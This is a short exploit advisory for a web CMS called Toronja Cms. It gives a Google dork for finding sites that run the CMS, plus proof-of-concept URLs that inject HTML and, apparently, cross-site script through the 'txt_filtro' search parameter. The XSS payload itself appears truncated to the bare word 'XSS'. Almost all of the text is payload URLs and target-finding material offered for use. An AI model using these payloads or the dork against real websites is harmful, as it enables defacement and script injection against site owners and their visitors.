1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
------------------------------------------------------------------------------------------- Toronja Cms HTML/XSS Injection Vulnerability ------------------------------------------------------------------------------------------- Author : CoBRa_21 Script Home : http://www.toronja.com.pe/ Dork : intext:"sitio web diseñado por www.toronja.com.pe" ------------------------------------------------------------------------------------------- HTML Injection: http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML ------------------------------------------------------------------------------------------- XSS Injection: http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS ------------------------------------------------------------------------------------------- |